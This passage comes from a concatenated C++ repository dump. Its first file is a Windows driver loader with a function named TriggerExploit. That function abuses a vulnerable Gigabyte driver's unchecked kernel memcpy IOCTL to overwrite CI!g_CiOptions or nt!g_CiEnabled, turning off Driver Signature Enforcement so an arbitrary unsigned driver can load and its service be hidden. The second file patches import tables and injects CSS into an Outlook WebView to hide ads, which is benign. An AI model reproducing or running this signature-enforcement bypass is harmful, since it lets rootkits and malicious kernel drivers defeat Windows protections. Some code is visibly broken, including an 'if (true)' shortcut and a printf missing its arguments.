Offset = i; 92 | } 93 | } 94 | if (Offset == 0) 95 | { 96 | printf("failed to find CiEnabled\n"); 97 | return 0; 98 | } 99 | 100 | LONG RealOffset = *reinterpret_cast((ULONG_PTR)MappedBase + Offset + 4); 101 | ULONG_PTR g_CiEnabled = (ULONG_PTR)MappedBase + RealOffset + Offset + 4 + 4; 102 | *gCiEnabledAddress = KernelBase + g_CiEnabled - (ULONG_PTR)MappedBase; 103 | printf("i : 0x%llx\n gCiEnabled : %llx\n gCiEnabledAddress : %llx\n"); 104 | return 1; 105 | } 106 | 107 | 108 | 109 | // For Windows 8 and worse 110 | static 111 | LONG 112 | QueryCiOptions( 113 | _In_ PVOID MappedBase, // ci.dll file 114 | _In_ ULONG_PTR KernelBase, //ci.dll kernel base 115 | _Out_ PULONG_PTR gCiOptionsAddress 116 | ) 117 | { 118 | *gCiOptionsAddress = 0; 119 | 120 | UINT64 CiInitializeAddress = (UINT64)GetProcedureAddress(reinterpret_cast(MappedBase), "CiInitialize"); 121 | const PUCHAR CiInitialize = reinterpret_cast(GetProcedureAddress(reinterpret_cast(MappedBase), "CiInitialize")); 122 | if (CiInitialize == nullptr) 123 | return 0; 124 | 125 | int Offset = 0; 126 | UINT16 j = 0; 127 | if (NtCurrentPeb()->OSBuildNumber >= 16299) 128 | { 129 | for (auto i = 0; i < 255; i++) 130 | { 131 | if (CompareByte(PUCHAR(CiInitialize + i), PUCHAR(Pattern_CipInit_1709), 16)) 132 | { 133 | Offset = i; 134 | } 135 | } 136 | for (j = 0; Pattern_CipInit_1709[j]; j++) 137 | ; 138 | } 139 | else 140 | { 141 | for (auto i = 0; i < 255; i++) 142 | { 143 | if (CompareByte(PUCHAR(CiInitialize + i), PUCHAR(Pattern_CipInit), 12)) 144 | { 145 | Offset = i; 146 | } 147 | } 148 | for (j = 0; Pattern_CipInit[j]; j++) 149 | ; 150 | } 151 | if (!Offset) 152 | { 153 | printf("failed to find CipInitialize\n"); 154 | return 0; 155 | } 156 | 157 | ULONG CipInitOffset = *reinterpret_cast(CiInitializeAddress + Offset + j); 158 | ULONG_PTR CipInitialize = CiInitializeAddress + CipInitOffset + Offset + j + 4; 159 | printf("CipOffset : %d, CipInitOffset : 0x%llx, CipInitialize : 0x%llx\n", Offset, CipInitOffset, CipInitialize); 160 | Offset = 0; 161 | j = 0; 162 | 163 | for (auto i = 0; i < 255; i++) 164 | { 165 | 166 | if (CompareByte(PUCHAR(CipInitialize + i), PUCHAR(Pattern_gCiOptions), 12)) 167 | { 168 | Offset = i; 169 | } 170 | } 171 | for (j = 0; Pattern_gCiOptions[j]; j++) 172 | ; 173 | if (!Offset) 174 | { 175 | printf("failed to find Ci_gOptions\n"); 176 | return 0; 177 | } 178 | 179 | 180 | INT32 RealOffset = *reinterpret_cast(CipInitialize + Offset + j); // RVA 181 | UINT64 g_CiOptions = CipInitialize + RealOffset + Offset + j + 4; // Calculate 182 | printf("Offset : %d RealOffset : %d g_CiOptions : 0x%llx ", Offset, RealOffset, g_CiOptions); 183 | *gCiOptionsAddress = KernelBase + g_CiOptions - (UINT64)MappedBase; 184 | 185 | return 1; 186 | } 187 | 188 | static 189 | NTSTATUS 190 | AnalyzeCi( 191 | _Out_ PVOID* CiOptionsAddress 192 | ) 193 | { 194 | *CiOptionsAddress = nullptr; 195 | 196 | // Map file as SEC_IMAGE 197 | WCHAR Path[MAX_PATH]; 198 | const CHAR NtoskrnlExe[] = "ntoskrnl.exe"; 199 | const CHAR CiDll[] = "CI.dll"; 200 | 201 | _snwprintf(Path, MAX_PATH / sizeof(WCHAR), L"%ls\\System32\\%hs", 202 | SharedUserData->NtSystemRoot, 203 | NtCurrentPeb()->OSBuildNumber >= 9200 ? CiDll : NtoskrnlExe); 204 | 205 | PVOID MappedBase; 206 | SIZE_T ViewSize; 207 | NTSTATUS Status = MapFileSectionView(Path, FALSE, &MappedBase, &ViewSize); 208 | if (!NT_SUCCESS(Status)) 209 | { 210 | printf("Failed to map %ls: %08X\n", Path, Status); 211 | return Status; 212 | } 213 | 214 | if (NtCurrentPeb()->OSBuildNumber >= 9200) 215 | { 216 | // Find CI.dll!g_CiOptions 217 | ULONG_PTR CiDllBase; 218 | Status = FindKernelModule(CiDll, &CiDllBase); 219 | if (!NT_SUCCESS(Status)) 220 | { 221 | printf("Failed to FindKernelModule %08X\n", Status); 222 | goto Exit; 223 | } 224 | 225 | ULONG_PTR gCiOptionsAddress; 226 | const LONG Rel = QueryCiOptions(MappedBase, CiDllBase, &gCiOptionsAddress); 227 | if (Rel != 0) 228 | { 229 | *CiOptionsAddress = reinterpret_cast(gCiOptionsAddress); 230 | Status = STATUS_SUCCESS; 231 | } 232 | else 233 | { 234 | 235 | Status = STATUS_NOT_FOUND; 236 | } 237 | } 238 | else 239 | { 240 | // Find ntoskrnl.exe!g_CiEnabled 241 | ULONG_PTR KernelBase; 242 | Status = FindKernelModule(NtoskrnlExe, &KernelBase); 243 | if (!NT_SUCCESS(Status)) 244 | goto Exit; 245 | 246 | ULONG_PTR gCiEnabledAddress; 247 | const LONG Rel = QueryCiEnabled(MappedBase, ViewSize, KernelBase, &gCiEnabledAddress); 248 | if (Rel != 0) 249 | { 250 | *CiOptionsAddress = reinterpret_cast(gCiEnabledAddress); 251 | Status = STATUS_SUCCESS; 252 | } 253 | else 254 | { 255 | Status = STATUS_NOT_FOUND; 256 | } 257 | } 258 | 259 | Exit: 260 | NtUnmapViewOfSection(NtCurrentProcess, MappedBase); 261 | return Status; 262 | } 263 | 264 | static int ConvertToNtPath(PWCHAR Dst, PWCHAR Src) // TODO: holy shit this is fucking horrible 265 | { 266 | wcscpy_s(Dst, sizeof(L"\\??\\") / sizeof(WCHAR), L"\\??\\"); 267 | wcscat_s(Dst, (MAX_PATH + sizeof(L"\\??\\")) / sizeof(WCHAR), Src); 268 | return static_cast(wcslen(Dst)) * sizeof(wchar_t) + sizeof(wchar_t); 269 | } 270 | 271 | static void FileNameToServiceName(PWCHAR ServiceName, PWCHAR FileName) 272 | { 273 | int p = sizeof(SVC_BASE) / sizeof(WCHAR) - 1; 274 | wcscpy_s(ServiceName, sizeof(SVC_BASE) / sizeof(WCHAR), SVC_BASE); 275 | for (PWCHAR i = FileName; *i; ++i) 276 | { 277 | if (*i == L'\\') 278 | FileName = i + 1; 279 | } 280 | while (*FileName != L'\0' && *FileName != L'.') 281 | ServiceName[p++] = *FileName++; 282 | ServiceName[p] = L'\0'; 283 | } 284 | 285 | static NTSTATUS CreateDriverService(PWCHAR ServiceName, PWCHAR FileName) 286 | { 287 | FileNameToServiceName(ServiceName, FileName); 288 | NTSTATUS Status = RtlCreateRegistryKey(RTL_REGISTRY_ABSOLUTE, ServiceName); 289 | if (!NT_SUCCESS(Status)) 290 | return Status; 291 | 292 | WCHAR NtPath[MAX_PATH]; 293 | ULONG ServiceType = SERVICE_KERNEL_DRIVER; 294 | 295 | Status = RtlWriteRegistryValue(RTL_REGISTRY_ABSOLUTE, 296 | ServiceName, 297 | L"ImagePath", 298 | REG_SZ, 299 | NtPath, 300 | ConvertToNtPath(NtPath, FileName)); 301 | if (!NT_SUCCESS(Status)) 302 | return Status; 303 | 304 | Status = RtlWriteRegistryValue(RTL_REGISTRY_ABSOLUTE, 305 | ServiceName, 306 | L"Type", 307 | REG_DWORD, 308 | &ServiceType, 309 | sizeof(ServiceType)); 310 | return Status; 311 | } 312 | 313 | static void DeleteService(PWCHAR ServiceName) 314 | { 315 | // TODO: shlwapi.dll? holy fuck this is horrible 316 | SHDeleteKeyW(HKEY_LOCAL_MACHINE, ServiceName + sizeof(NT_MACHINE) / sizeof(WCHAR) - 1); 317 | } 318 | 319 | static BOOLEAN IsCiEnabled() 320 | { 321 | SYSTEM_CODEINTEGRITY_INFORMATION CiInfo = { sizeof(SYSTEM_CODEINTEGRITY_INFORMATION) }; 322 | const NTSTATUS Status = NtQuerySystemInformation(SystemCodeIntegrityInformation, 323 | &CiInfo, 324 | sizeof(CiInfo), 325 | nullptr); 326 | if (!NT_SUCCESS(Status)) 327 | printf("Failed to query code integrity status: %08X\n", Status); 328 | 329 | return (CiInfo.CodeIntegrityOptions & 330 | (CODEINTEGRITY_OPTION_ENABLED | CODEINTEGRITY_OPTION_TESTSIGN)) == CODEINTEGRITY_OPTION_ENABLED; 331 | } 332 | 333 | static NTSTATUS LoadDriver(PWCHAR ServiceName) 334 | { 335 | UNICODE_STRING ServiceNameUcs; 336 | RtlInitUnicodeString(&ServiceNameUcs, ServiceName); 337 | return NtLoadDriver(&ServiceNameUcs); 338 | } 339 | 340 | static NTSTATUS UnloadDriver(PWCHAR ServiceName) 341 | { 342 | UNICODE_STRING ServiceNameUcs; 343 | RtlInitUnicodeString(&ServiceNameUcs, ServiceName); 344 | return NtUnloadDriver(&ServiceNameUcs); 345 | } 346 | 347 | static 348 | NTSTATUS 349 | OpenDeviceHandle( 350 | _Out_ PHANDLE DeviceHandle, 351 | _In_ BOOLEAN PrintErrors 352 | ) 353 | { 354 | UNICODE_STRING DeviceName = RTL_CONSTANT_STRING(GIO_DEVICE_NAME); 355 | OBJECT_ATTRIBUTES ObjectAttributes = RTL_CONSTANT_OBJECT_ATTRIBUTES(&DeviceName, OBJ_CASE_INSENSITIVE); 356 | IO_STATUS_BLOCK IoStatusBlock; 357 | 358 | const NTSTATUS Status = NtCreateFile(DeviceHandle, 359 | SYNCHRONIZE, // Yes, these really are the only access rights needed. (actually would be 0, but we want SYNCHRONIZE to wait on NtDeviceIoControlFile) 360 | &ObjectAttributes, 361 | &IoStatusBlock, 362 | nullptr, 363 | FILE_ATTRIBUTE_NORMAL, 364 | FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, 365 | FILE_OPEN, 366 | FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, 367 | nullptr, 368 | 0); 369 | 370 | if (!NT_SUCCESS(Status) && PrintErrors) // The first open is expected to fail; don't spam the user about it 371 | printf("Failed to obtain handle to device %wZ: NtCreateFile: %08X.\n", &DeviceName, Status); 372 | 373 | return Status; 374 | } 375 | 376 | static 377 | NTSTATUS 378 | TriggerExploit( 379 | _In_ PWSTR LoaderServiceName, 380 | _In_ PVOID CiVariableAddress, 381 | _In_ ULONG CiOptionsValue, 382 | _Out_opt_ PULONG OldCiOptionsValue 383 | ) 384 | { 385 | if (OldCiOptionsValue != nullptr) 386 | *OldCiOptionsValue = 0; 387 | 388 | // First try to open the device without loading the driver. This only works if it was already loaded 389 | HANDLE DeviceHandle; 390 | NTSTATUS Status = OpenDeviceHandle(&DeviceHandle, FALSE); 391 | if (!NT_SUCCESS(Status)) 392 | { 393 | // Load the Gigabyte loader driver 394 | Status = LoadDriver(LoaderServiceName); 395 | if (!NT_SUCCESS(Status)) 396 | { 397 | printf("Failed to load driver service %ls. NtLoadDriver: %08X.\n", LoaderServiceName, Status); 398 | return Status; 399 | } 400 | 401 | // The device should exist now. If we still can't open it, bail 402 | Status = OpenDeviceHandle(&DeviceHandle, TRUE); 403 | if (!NT_SUCCESS(Status)) 404 | return Status; 405 | } 406 | 407 | // Number of bytes to read/write: 1 on Windows 7, 4 on lesser OSes 408 | const ULONG CiPatchSize = NtCurrentPeb()->OSBuildNumber >= 9200 ? sizeof(ULONG) : sizeof(UCHAR); 409 | const UCHAR CiOptionsValueByte = static_cast(CiOptionsValue); 410 | 411 | GIOMemcpyInput MemcpyInput; 412 | IO_STATUS_BLOCK IoStatusBlock; 413 | 414 | if (OldCiOptionsValue != nullptr) // Only perform this read if the original value was requested 415 | { 416 | // Set up memcpy input for a read operation 417 | ULONG OldCiOptions = 0; 418 | MemcpyInput.Dst = reinterpret_cast(&OldCiOptions); 419 | MemcpyInput.Src = reinterpret_cast(CiVariableAddress); 420 | MemcpyInput.Size = CiPatchSize; 421 | 422 | // IOCTL (1): Read the current value of g_CiEnabled/g_CiOptions so we can restore it later 423 | Status = NtDeviceIoControlFile(DeviceHandle, 424 | nullptr, 425 | nullptr, 426 | nullptr, 427 | &IoStatusBlock, 428 | IOCTL_GIO_MEMCPY, 429 | &MemcpyInput, 430 | sizeof(MemcpyInput), 431 | nullptr, 432 | 0); 433 | if (!NT_SUCCESS(Status)) 434 | { 435 | printf("NtDeviceIoControlFile(IOCTL_GIO_MEMCPY) *READ* failed: error %08X\n", Status); 436 | goto Exit; 437 | } 438 | 439 | // Use the out parameter to return the previous value of g_CiOptions 440 | *OldCiOptionsValue = OldCiOptions; 441 | } 442 | 443 | // Set up memcpy input a second time, this time for writing 444 | MemcpyInput.Dst = reinterpret_cast(CiVariableAddress); 445 | MemcpyInput.Src = CiPatchSize == sizeof(ULONG) 446 | ? reinterpret_cast(&CiOptionsValue) 447 | : reinterpret_cast(&CiOptionsValueByte); 448 | MemcpyInput.Size = CiPatchSize; 449 | 450 | // IOCTL (2): Use the driver IOCTL's juicy memcpy that performs zero access checks to write the desired value to the kernel address 451 | RtlZeroMemory(&IoStatusBlock, sizeof(IoStatusBlock)); 452 | Status = NtDeviceIoControlFile(DeviceHandle, 453 | nullptr, 454 | nullptr, 455 | nullptr, 456 | &IoStatusBlock, 457 | IOCTL_GIO_MEMCPY, 458 | &MemcpyInput, 459 | sizeof(MemcpyInput), 460 | nullptr, 461 | 0); 462 | if (!NT_SUCCESS(Status)) 463 | printf("NtDeviceIoControlFile(IOCTL_GIO_MEMCPY) *WRITE* failed: error %08X\n", Status); 464 | 465 | Exit: 466 | NtClose(DeviceHandle); 467 | 468 | return Status; 469 | } 470 | 471 | NTSTATUS 472 | WindLoadDriver( 473 | _In_ PWCHAR LoaderName, 474 | _In_ PWCHAR DriverName, 475 | _In_ BOOLEAN Hidden 476 | ) 477 | { 478 | WCHAR LoaderPath[MAX_PATH], DriverPath[MAX_PATH]; 479 | 480 | // Find CI!g_CiOptions/nt!g_CiEnabled 481 | PVOID CiOptionsAddress; 482 | NTSTATUS Status = AnalyzeCi(&CiOptionsAddress); 483 | if (!NT_SUCCESS(Status)) 484 | return Status; 485 | 486 | printf("%ls at 0x%p.\n", (NtCurrentPeb()->OSBuildNumber >= 9200 ? L"CI!g_CiOptions" : L"nt!g_CiEnabled"), CiOptionsAddress); 487 | 488 | // Enable privileges 489 | CONSTEXPR CONST ULONG SE_LOAD_DRIVER_PRIVILEGE = 10UL; 490 | BOOLEAN SeLoadDriverWasEnabled; 491 | Status = RtlAdjustPrivilege(SE_LOAD_DRIVER_PRIVILEGE, 492 | TRUE, 493 | FALSE, 494 | &SeLoadDriverWasEnabled); 495 | 496 | if (!NT_SUCCESS(Status)) 497 | { 498 | printf("Fatal error: failed to acquire SE_LOAD_DRIVER_PRIVILEGE. Make sure you are running as administrator.\n"); 499 | return Status; 500 | } 501 | 502 | // Expand filenames to full paths 503 | //Status = RtlGetFullPathName_UEx(LoaderName, MAX_PATH * sizeof(WCHAR), LoaderPath, nullptr, nullptr); 504 | //if (!NT_SUCCESS(Status)) 505 | // return Status; 506 | Status = RtlGetFullPathName_UEx(DriverName, MAX_PATH * sizeof(WCHAR), DriverPath, nullptr, nullptr); 507 | if (!NT_SUCCESS(Status)) 508 | return Status; 509 | 510 | // Create the target driver service 511 | Status = CreateDriverService(DriverServiceName, DriverPath); 512 | if (!NT_SUCCESS(Status)) 513 | return Status; 514 | 515 | if (true) 516 | { 517 | // CI is already disabled, just load the driver 518 | printf("WARNING: CI is already disabled!\n"); 519 | return LoadDriver(DriverServiceName); 520 | } 521 | 522 | // Create the loader driver service 523 | Status = CreateDriverService(LoaderServiceName, LoaderPath); 524 | if (!NT_SUCCESS(Status)) 525 | return Status; 526 | 527 | // Disable CI 528 | ULONG OldCiOptionsValue; 529 | Status = TriggerExploit(LoaderServiceName, CiOptionsAddress, 0, &OldCiOptionsValue); 530 | if (!NT_SUCCESS(Status)) 531 | { 532 | printf("Failed to disable DSE through Gigabyte loader driver: %08X\n", Status); 533 | goto Exit; 534 | } 535 | 536 | printf("Successfully disabled DSE."); 537 | if (NtCurrentPeb()->OSBuildNumber >= 9200) 538 | { 539 | printf(" Original g_CiOptions value: 0x%X.", OldCiOptionsValue); 540 | } 541 | printf("\n"); 542 | 543 | // Load target driver 544 | Status = LoadDriver(DriverServiceName); 545 | 546 | if (!NT_SUCCESS(Status)) 547 | { 548 | if (Status == STATUS_IMAGE_ALREADY_LOADED) 549 | { 550 | // Already loaded - attempt to reload 551 | Status = UnloadDriver(DriverServiceName); 552 | if (!NT_SUCCESS(Status)) 553 | printf("Target driver is already loaded, and unloading failed with status %08X\n", Status); 554 | else 555 | { 556 | Status = LoadDriver(DriverServiceName); 557 | if (!NT_SUCCESS(Status)) 558 | printf("Failed to reload target driver: %08X\n", Status); 559 | else 560 | printf("Succesfully reloaded target driver.\n"); 561 | } 562 | } 563 | else 564 | printf("Failed to load target driver: %08X\n", Status); 565 | } 566 | else 567 | { 568 | printf("Target driver loaded successfully.\n"); 569 | } 570 | 571 | // Reset original CI status 572 | Status = TriggerExploit(LoaderServiceName, CiOptionsAddress, OldCiOptionsValue, nullptr); 573 | if (!NT_SUCCESS(Status)) 574 | { 575 | printf("WARNING: failed to re-enable DSE through Gigabyte loader driver: %08X\n", Status); 576 | Status = STATUS_SUCCESS; // Don't DeleteService() the target driver in the error path below; we are past the point of no return 577 | } 578 | else 579 | { 580 | printf("Successfully re-enabled DSE.\n"); 581 | } 582 | 583 | // Unload the loader driver since we are done with it 584 | UnloadDriver(LoaderServiceName); 585 | DeleteService(LoaderServiceName); 586 | 587 | Exit: 588 | if (!NT_SUCCESS(Status) || Hidden) 589 | DeleteService(DriverServiceName); 590 | 591 | // Revert privileges 592 | RtlAdjustPrivilege(SE_LOAD_DRIVER_PRIVILEGE, 593 | SeLoadDriverWasEnabled, 594 | FALSE, 595 | &SeLoadDriverWasEnabled); 596 | 597 | return Status; 598 | } 599 | 600 | NTSTATUS 601 | WindUnloadDriver( 602 | _In_ PWCHAR DriverName, 603 | _In_ BOOLEAN Hidden 604 | ) 605 | { 606 | CONSTEXPR CONST ULONG SE_LOAD_DRIVER_PRIVILEGE = 10UL; 607 | BOOLEAN SeLoadDriverWasEnabled; 608 | NTSTATUS Status = RtlAdjustPrivilege(SE_LOAD_DRIVER_PRIVILEGE, 609 | TRUE, 610 | FALSE, 611 | &SeLoadDriverWasEnabled); 612 | if (!NT_SUCCESS(Status)) 613 | return Status; 614 | 615 | if (DriverName != nullptr && Hidden) 616 | CreateDriverService(DriverServiceName, DriverName); 617 | 618 | FileNameToServiceName(DriverServiceName, DriverName); 619 | 620 | Status = UnloadDriver(DriverServiceName); 621 | if (NT_SUCCESS(Status) || Hidden) 622 | DeleteService(DriverServiceName); 623 | 624 | RtlAdjustPrivilege(SE_LOAD_DRIVER_PRIVILEGE, 625 | SeLoadDriverWasEnabled, 626 | FALSE, 627 | &SeLoadDriverWasEnabled); 628 | 629 | return Status; 630 | } 631 | -------------------------------------------------------------------------------- /NOP/worker/dllmain.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "WebView2.h" 9 | #include "WebView2EnvironmentOptions.h" 10 | 11 | #pragma region "IAT patching routine" 12 | // https://blog.neteril.org/blog/2016/12/23/diverting-functions-windows-iat-patching/ 13 | inline bool VnPatchIAT(HMODULE hMod, const char* libName, const char* funcName, uintptr_t hookAddr) { 14 | // Increment module reference count to prevent other threads from unloading it while we're working with it 15 | HMODULE module; 16 | if (!::GetModuleHandleExW(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, (LPCWSTR)hMod, &module)) return false; 17 | 18 | // Get a reference to the import table to locate the kernel32 entry 19 | PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)module; 20 | PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)((uintptr_t)module + dos->e_lfanew); 21 | PIMAGE_IMPORT_DESCRIPTOR importDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((uintptr_t)module + 22 | nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); 23 | 24 | // In the import table find the entry that corresponds to kernel32 25 | bool found = false; 26 | while (importDescriptor->Characteristics && importDescriptor->Name) { 27 | PSTR importName = (PSTR)((PBYTE)module + importDescriptor->Name); 28 | if (::_stricmp(importName, libName) == 0) { found = true; break; } 29 | importDescriptor++; 30 | } 31 | if (!found) { ::FreeLibrary(module); return false; } 32 | 33 | // From the kernel32 import descriptor, go over its IAT thunks to 34 | // find the one used by the rest of the code to call GetProcAddress 35 | PIMAGE_THUNK_DATA oldthunk = (PIMAGE_THUNK_DATA)((PBYTE)module + importDescriptor->OriginalFirstThunk); 36 | PIMAGE_THUNK_DATA thunk = (PIMAGE_THUNK_DATA)((PBYTE)module + importDescriptor->FirstThunk); 37 | while (thunk->u1.Function) { 38 | PROC* funcStorage = (PROC*)&thunk->u1.Function; 39 | 40 | bool bFound = false; 41 | if (oldthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) { 42 | bFound = (!(*((WORD*)&(funcName)+1)) && IMAGE_ORDINAL32(oldthunk->u1.Ordinal) == (DWORD_PTR)funcName); 43 | } 44 | else { 45 | PIMAGE_IMPORT_BY_NAME byName = (PIMAGE_IMPORT_BY_NAME)((uintptr_t)module + oldthunk->u1.AddressOfData); 46 | bFound = ((*((WORD*)&(funcName)+1)) && !::_stricmp((char*)byName->Name, funcName)); 47 | } 48 | 49 | // Found it, now let's patch it 50 | if (bFound) { 51 | // Get the memory page where the info is stored 52 | MEMORY_BASIC_INFORMATION mbi; 53 | ::VirtualQuery(funcStorage, &mbi, sizeof(MEMORY_BASIC_INFORMATION)); 54 | 55 | // Try to change the page to be writable if it's not already 56 | if (!::VirtualProtect(mbi.BaseAddress, mbi.RegionSize, PAGE_READWRITE, &mbi.Protect)) { 57 | ::FreeLibrary(module); 58 | return false; 59 | } 60 | 61 | // Store our hook 62 | *funcStorage = (PROC)hookAddr; 63 | 64 | // Restore the old flag on the page 65 | DWORD dwOldProtect; 66 | ::VirtualProtect(mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &dwOldProtect); 67 | 68 | // Profit 69 | ::FreeLibrary(module); 70 | return true; 71 | } 72 | 73 | thunk++; 74 | oldthunk++; 75 | } 76 | 77 | ::FreeLibrary(module); 78 | return false; 79 | } 80 | 81 | inline BOOL VnPatchDelayIAT(HMODULE hMod, const char* libName, const char* funcName, uintptr_t hookAddr) { 82 | // Increment module reference count to prevent other threads from unloading it while we're working with it 83 | HMODULE lib; 84 | if (!GetModuleHandleExW(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, (LPCWSTR)hMod, &lib)) return FALSE; 85 | 86 | PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)lib; 87 | PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)((uintptr_t)lib + dos->e_lfanew); 88 | PIMAGE_DELAYLOAD_DESCRIPTOR dload = (PIMAGE_DELAYLOAD_DESCRIPTOR)((uintptr_t)lib + 89 | nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].VirtualAddress); 90 | while (dload->DllNameRVA) 91 | { 92 | char* dll = (char*)((uintptr_t)lib + dload->DllNameRVA); 93 | if (!_stricmp(dll, libName)) { 94 | #ifdef _LIBVALINET_DEBUG_HOOKING_IATPATCH 95 | printf("[PatchDelayIAT] Found %s in IAT.\n", libName); 96 | #endif 97 | 98 | PIMAGE_THUNK_DATA firstthunk = (PIMAGE_THUNK_DATA)((uintptr_t)lib + dload->ImportNameTableRVA); 99 | PIMAGE_THUNK_DATA functhunk = (PIMAGE_THUNK_DATA)((uintptr_t)lib + dload->ImportAddressTableRVA); 100 | while (firstthunk->u1.AddressOfData) 101 | { 102 | if (firstthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) 103 | { 104 | if (!(*((WORD*)&(funcName)+1)) && IMAGE_ORDINAL32(firstthunk->u1.Ordinal) == (DWORD_PTR)funcName) 105 | { 106 | DWORD oldProtect; 107 | if (VirtualProtect(&functhunk->u1.Function, sizeof(uintptr_t), PAGE_EXECUTE_READWRITE, &oldProtect)) 108 | { 109 | functhunk->u1.Function = (uintptr_t)hookAddr; 110 | VirtualProtect(&functhunk->u1.Function, sizeof(uintptr_t), oldProtect, &oldProtect); 111 | #ifdef _LIBVALINET_DEBUG_HOOKING_IATPATCH 112 | printf("[PatchDelayIAT] Patched 0x%x in %s to 0x%p.\n", funcName, libName, hookAddr); 113 | #endif 114 | FreeLibrary(lib); 115 | return TRUE; 116 | } 117 | FreeLibrary(lib); 118 | return FALSE; 119 | } 120 | } 121 | else 122 | { 123 | PIMAGE_IMPORT_BY_NAME byName = (PIMAGE_IMPORT_BY_NAME)((uintptr_t)lib + firstthunk->u1.AddressOfData); 124 | if ((*((WORD*)&(funcName)+1)) && !_stricmp((char*)byName->Name, funcName)) 125 | { 126 | DWORD oldProtect; 127 | if (VirtualProtect(&functhunk->u1.Function, sizeof(uintptr_t), PAGE_EXECUTE_READWRITE, &oldProtect)) 128 | { 129 | functhunk->u1.Function = (uintptr_t)hookAddr; 130 | VirtualProtect(&functhunk->u1.Function, sizeof(uintptr_t), oldProtect, &oldProtect); 131 | #ifdef _LIBVALINET_DEBUG_HOOKING_IATPATCH 132 | printf("[PatchDelayIAT] Patched %s in %s to 0x%p.\n", funcName, libName, hookAddr); 133 | #endif 134 | FreeLibrary(lib); 135 | return TRUE; 136 | } 137 | FreeLibrary(lib); 138 | return FALSE; 139 | } 140 | } 141 | functhunk++; 142 | firstthunk++; 143 | } 144 | } 145 | dload++; 146 | } 147 | FreeLibrary(lib); 148 | return FALSE; 149 | } 150 | #pragma endregion 151 | 152 | #pragma region "Hooks" 153 | /* 154 | LRESULT(*__WndProc)(HWND, UINT, WPARAM, LPARAM) = nullptr; 155 | LRESULT _WndProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam) { 156 | return __WndProc(hWnd, uMsg, wParam, lParam); 157 | } 158 | */ 159 | 160 | HRESULT(*__ICoreWebView2CreateCoreWebView2ControllerCompletedHandler_Invoke)(ICoreWebView2CreateCoreWebView2ControllerCompletedHandler* _this, HRESULT, ICoreWebView2Controller*) = nullptr; 161 | HRESULT STDMETHODCALLTYPE _ICoreWebView2CreateCoreWebView2ControllerCompletedHandler_Invoke(ICoreWebView2CreateCoreWebView2ControllerCompletedHandler* _this, HRESULT errorCode, ICoreWebView2Controller* createdController) { 162 | if (createdController != nullptr) { 163 | winrt::com_ptr webview; 164 | winrt::check_hresult(createdController->get_CoreWebView2(webview.put())); 165 | 166 | EventRegistrationToken tkn_NavigationCompleted; 167 | winrt::check_hresult(webview->add_NavigationCompleted(Microsoft::WRL::Callback([](ICoreWebView2* sender, ICoreWebView2NavigationCompletedEventArgs* args) -> HRESULT { 168 | 169 | auto script = L"\ 170 | const styleElement = document.createElement('style');\n\ 171 | const cssClass = \"\ 172 | #OwaContainer, #OwaContainerSlot1, " /* First "email" ad when online */ L"\ 173 | .kk1xx._Bfyd.iIsOF.IjQyD, .kk1xx.lHRXq.iIsOF.IjQyD, " /* First "email" ad when offline */ L"\ 174 | .syTot, " /* Lower left OneDrive subscription banner */ L"\ 175 | [id='34318026-c018-414b-abb3-3e32dfb9cc4c'], " /* Word button in sidebar */ L"\ 176 | [id='c5251a9b-a95d-4595-91ee-a39e6eed3db2'], " /* Excel button in sidebar */ L"\ 177 | [id='48cb9ead-1c19-4e1f-8ed9-3d60a7e52b18'], " /* PowerPoint button in sidebar */ L"\ 178 | [id='59391057-d7d7-49fd-a041-d8e4080f05ec'], " /* To Do button in sidebar */ L"\ 179 | [id='39109bd4-9389-4731-b8d6-7cc1a128d0b3'], " /* OneDrive button in sidebar */ L"\ 180 | .___1fkhojs.f22iagw.f122n59.f1vx9l62.f1c21dwh.fqerorx.f1i5mqs4, " /* More apps button in sidebar */ L"\ 181 | [id='D64D0004-2A11-442B-9586-F49009D4852B'] { display: none !important; }\";\n\ 182 | styleElement.appendChild(document.createTextNode(cssClass));\n\ 183 | document.head.appendChild(styleElement);\n\ 184 | "; 185 | // .root-192, .splitButtonMenuButton-220 { background-color: transparent !important; color: var(--neutralDark) !important; } " /* Deemphasize New mail button */ L"\ 186 | 187 | //::MessageBoxW(nullptr, script, L"", 0); 188 | sender->ExecuteScript(script, Microsoft::WRL::Callback([&](HRESULT errorCode, LPCWSTR resultObjectAsJson) -> HRESULT { 189 | return S_OK; 190 | }).Get()); 191 | 192 | return S_OK; 193 | }).Get(), &tkn_NavigationCompleted)); 194 | 195 | volatile int dummyF12Enabled = 0; 196 | const wchar_t* isF12Enabled = L"y_1A36CD25-E20F-4D0D-B1E6-3CC4307E1488"; 197 | if (isF12Enabled[0 + dummyF12Enabled] == L'y') { 198 | EventRegistrationToken tkn_AcceleratorKeyPressed; 199 | winrt::check_hresult(createdController->add_AcceleratorKeyPressed(Microsoft::WRL::Callback([](ICoreWebView2Controller* sender, ICoreWebView2AcceleratorKeyPressedEventArgs* args) -> HRESULT { 200 | 201 | COREWEBVIEW2_KEY_EVENT_KIND kind; 202 | winrt::check_hresult(args->get_KeyEventKind(&kind)); 203 | if (kind == COREWEBVIEW2_KEY_EVENT_KIND_KEY_UP) { 204 | UINT key; 205 | winrt::check_hresult(args->get_VirtualKey(&key)); 206 | if (key == VK_F12) { 207 | winrt::check_hresult(args->put_Handled(true)); 208 | winrt::com_ptr webview; 209 | winrt::check_hresult(sender->get_CoreWebView2(webview.put())); 210 | webview->OpenDevToolsWindow(); 211 | } 212 | } 213 | 214 | return S_OK; 215 | }).Get(), &tkn_AcceleratorKeyPressed)); 216 | } 217 | 218 | /* 219 | HWND 